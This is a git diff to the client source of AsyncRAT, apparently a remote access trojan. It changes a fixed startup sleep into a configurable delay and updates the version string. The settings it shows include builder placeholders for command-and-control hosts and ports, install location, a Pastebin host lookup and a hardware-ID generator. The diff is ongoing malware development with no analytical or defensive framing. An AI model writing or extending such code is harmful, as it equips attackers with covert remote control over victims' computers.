diff --git a/AsyncRAT-C#/Client/Program.cs b/AsyncRAT-C#/Client/Program.cs index b7ed309..9422cd9 100644 --- a/AsyncRAT-C#/Client/Program.cs +++ b/AsyncRAT-C#/Client/Program.cs @@ -18,7 +18,10 @@ namespace Client { public static void Main() { - Thread.Sleep(2500); + for (int i = 0; i < Convert.ToInt32(Settings.Delay); i++) + { + Thread.Sleep(1000); + } if (!Settings.InitializeSettings()) Environment.Exit(0); try diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index 7dfa462..3f60972 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -13,7 +13,7 @@ namespace Client #if DEBUG public static string Ports = "6606"; public static string Hosts = "127.0.0.1"; - public static string Version = "0.5.4H"; + public static string Version = "0.5.5A"; public static string Install = "false"; public static string InstallFolder = "AppData"; public static string InstallFile = "Test.exe"; @@ -27,6 +27,7 @@ namespace Client public static string Pastebin = "null"; public static string BDOS = "false"; public static string Hwid = HwidGen.HWID(); + public static string Delay = "0"; #else public static string Ports = "%Ports%"; @@ -45,6 +46,7 @@ namespace Client public static string Pastebin = "%Pastebin%"; public static string BDOS = "%BDOS%"; public static string Hwid = ""; + public static string Delay = "%Delay%"; #endif